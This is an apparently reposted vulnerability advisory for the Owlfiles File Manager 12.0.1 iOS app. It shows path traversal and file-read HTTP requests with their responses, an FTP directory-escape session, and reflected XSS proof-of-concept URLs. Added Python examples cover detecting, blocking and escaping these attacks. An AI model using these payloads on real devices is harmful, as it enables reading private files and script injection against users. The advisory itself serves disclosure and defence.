Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion

CVE: N/A
Category: CWE-200
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Local
Date: 2022-09-20
CPE: cpe:/a:owlfiles:file_manager:12.0.1
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.59
EPSSP: 96.376


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090054

Below is a copy:

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion
# Exploit Title: Owlfiles File Manager 12.0.1 - multiple vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iOS 16.0




###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: 192.168.8.101:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>


#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.8.101:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://192.168.8.101:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost
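The two HTTP exchanges above both return 200 for a request path that climbs out of the shared folder, which is exactly the signal a defender can look for in the server's access log. The following is an added example, not code from the advisory or from the Owlfiles app: it scans constructed access-log lines (the combined-log layout and the client address are assumed) for traversal segments, percent-decoding the request target first so encoded forms such as `%2e%2e%2f` are caught, and flags the ones the server actually served with a 200.

```python
"""Detect directory-traversal attempts in web-server access-log lines.

Added example, not part of the advisory. The log lines are constructed to
mirror the requests shown in the advisory; the log format is assumed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in an assumed combined-log layout (not the app's own log).
SAMPLE_LOG = """\
192.168.8.20 - - [19/Sep/2022:05:01:11 +0000] "GET /../../../../../../../../../../../../../../../System/ HTTP/1.1" 200 317
192.168.8.20 - - [19/Sep/2022:03:28:14 +0000] "GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1" 200 213
192.168.8.20 - - [19/Sep/2022:03:29:02 +0000] "GET /download?path=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
192.168.8.20 - - [19/Sep/2022:03:30:40 +0000] "GET /list?path=Documents/ HTTP/1.1" 200 512
192.168.8.20 - - [19/Sep/2022:03:31:05 +0000] "GET /download?path=%2e%2e%5cphotos HTTP/1.1" 404 0
"""

# Pull method, request target and status out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"\s+(?P<status>\d{3})')

# A traversal segment is a bare ".." followed by "/" or "\" (or end of string).
# The look-behind stops "file..txt" or "..." from matching.
TRAVERSAL_RE = re.compile(r'(?<![\w.-])\.\.(?=[\\/]|$)')


def normalize_target(target: str) -> str:
    """Percent-decode repeatedly (at most 3 rounds) so double-encoded '../' collapses."""
    decoded = target
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def find_traversal_attempts(log_text: str) -> List[Dict]:
    """Return one record per log line whose decoded request target contains a
    traversal segment. 'served' is True when the server answered 200, i.e. the
    request most likely reached a file outside the share."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = normalize_target(m.group("target"))
        if TRAVERSAL_RE.search(decoded):
            hits.append({
                "target": m.group("target"),
                "decoded": decoded,
                "status": int(m.group("status")),
                "served": m.group("status") == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        flag = "SERVED" if hit["served"] else "blocked"
        print(f"{flag:7} {hit['status']} {hit['decoded']}")
```

Triage on the `served` flag: a traversal target answered with 404 or 403 is reconnaissance, while a 200 on a path like `/etc/hosts` means the built-in server handed the file over and the device should be treated as exposed.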



###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x     0 root wheel        256 Jan 01 1970 usr
drwxr-xr-x     0 root wheel        128 Jan 01 1970 bin
drwxr-xr-x     0 root wheel        608 Jan 01 1970 sbin
drwxr-xr-x     0 root wheel        224 Jan 01 1970 System
drwxr-xr-x     0 root wheel        640 Jan 01 1970 Library
drwxr-xr-x     0 root wheel        224 Jan 01 1970 private
drwxr-xr-x     0 root wheel       1131 Jan 01 1970 dev
drwxr-xr-x     0 root admin       4512 Jan 01 1970 Applications
drwxr-xr-x     0 root admin         64 Jan 01 1970 Developer
drwxr-xr-x     0 root admin         64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>
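The HTTP path, the `?path=` parameter and the FTP `cd` argument all fail the same way: the client-supplied path is joined to the shared folder without checking where it ends up. The fix is one containment check applied before any filesystem access. The following is an added example of that check, not GCDWebUploader's or Owlfiles' code: it resolves the request against a share root (a constructed temporary directory with a file inside, a file outside, and a symlink that points outside) and refuses anything whose resolved location is not under the root. The single percent-decode step and the literal `REFUSED` return value are assumptions of the example; a real handler would send 403.

```python
"""Containment check for a file-serving root (added example, not the app's code).

Resolve the requested path against the share root and refuse anything that lands
outside it, including paths that escape through a symlink inside the share.
"""
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class PathOutsideRoot(Exception):
    """Raised when a client-supplied path resolves outside the served root."""


def resolve_in_root(root: Path, requested: str) -> Path:
    """Map a client-supplied path (URL path, ?path= value or FTP CWD argument)
    to a filesystem path, raising PathOutsideRoot if it escapes `root`."""
    root_real = root.resolve()
    # Assumption: decode percent-encoding once and treat backslashes as separators,
    # so "%2e%2e%2f" and "..\\" are normalized before the check.
    cleaned = unquote(requested).replace("\\", "/")
    # Strip leading slashes so the path is always joined *under* root, never absolute.
    candidate = (root_real / cleaned.lstrip("/")).resolve()
    # resolve() collapses ".." and follows symlinks, so the containment test runs
    # on where the path really points, not on its spelling.
    try:
        candidate.relative_to(root_real)
    except ValueError:
        raise PathOutsideRoot(requested) from None
    return candidate


def build_demo_root() -> Path:
    """Constructed layout: base/shared (the share) plus base/secret.txt outside it."""
    base = Path(tempfile.mkdtemp(prefix="share-demo-"))
    root = base / "shared"
    root.mkdir()
    (root / "notes.txt").write_text("inside the shared folder\n")
    (base / "secret.txt").write_text("outside the shared folder\n")
    # A symlink inside the share that points outside it; resolve() follows it,
    # which is why the check must use the resolved path.
    os.symlink(base / "secret.txt", root / "link-to-secret")
    return root


def serve(root: Path, requested: str) -> str:
    """Return file contents or a 'DIR:' listing for an in-root request, or the
    literal string 'REFUSED' (assumed placeholder for a 403) when it escapes."""
    try:
        target = resolve_in_root(root, requested)
    except PathOutsideRoot:
        return "REFUSED"
    if target.is_dir():
        return "DIR:" + ",".join(sorted(p.name for p in target.iterdir()))
    return target.read_text()


if __name__ == "__main__":
    share = build_demo_root()
    for req in ("notes.txt", "/../../../../../../../../../../../../../../../etc/hosts",
                "../secret.txt", "link-to-secret", "../../../../../../../../../"):
        print(f"{req!r:60} -> {serve(share, req)!r}")
```

The FTP `cd ../../../../../../../../../` from the session above maps to the same `resolve_in_root` call as the HTTP requests, so one function protects both listeners. Note that the decode step means a file whose name contains a literal `%` must be requested percent-encoded; servers that receive an already-decoded path should skip that line rather than decode twice.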

#############
XSS on HTTP built-in server
#############

PoC 1:

http://192.168.8.101:8080/download?path=<script>alert(rose)</script>

PoC 2:

http://192.168.8.101:8080/list?path=<script>alert(rose)</script>
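Both PoC URLs work because the `download` and `list` handlers echo the `path` value back into the HTML listing without escaping it. The following is an added example, not GCDWebUploader's or Owlfiles' code: it parses the `path` parameter from a request URL and builds a directory listing in the same shape as the one returned in the first exchange above, escaping every untrusted value for the context it lands in (HTML text versus the `href` URL). The `<p>Listing of ...</p>` line and the `render_not_found` page are assumptions added to show the echoed path being handled safely.

```python
"""Context-aware escaping for a reflected `path` parameter (added example)."""
from html import escape
from typing import Iterable, Tuple
from urllib.parse import parse_qs, quote, urlsplit


def path_param(url: str) -> str:
    """Extract ?path= from a request URL; a missing or empty value means the share root."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("path", [""])[0]


def render_listing(requested_path: str, entries: Iterable[Tuple[str, bool]]) -> str:
    """Build the <ul> listing. `entries` is (name, is_dir); names and the echoed
    path are untrusted and are escaped for HTML text, while hrefs are percent-encoded."""
    shown = escape(requested_path or "/", quote=True)
    items = []
    for name, is_dir in entries:
        label = name + ("/" if is_dir else "")
        href = quote(label, safe="/")          # URL context: percent-encode
        text = escape(label, quote=True)       # HTML text context: entity-encode
        items.append(f'<li><a href="{href}">{text}</a></li>')
    return ('<!DOCTYPE html>\n<html><head><meta charset="utf-8"></head><body>\n'
            f"<p>Listing of {shown}</p>\n<ul>\n" + "\n".join(items)
            + "\n</ul>\n</body></html>")


def render_not_found(requested_path: str) -> str:
    """Error page that echoes the path; the same escaping rule applies here."""
    return f"<p>Not found: {escape(requested_path, quote=True)}</p>"


if __name__ == "__main__":
    url = "http://192.168.8.101:8080/list?path=<script>alert(rose)</script>"
    print(render_listing(path_param(url), [("notes.txt", False), ("<b>dir</b>", True)]))
```

The escaping is per context: `html.escape` for anything placed between tags or inside a quoted attribute, `urllib.parse.quote` for the `href` value. Escaping for one context and reusing the result in the other is the usual way such a fix reintroduces the bug.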
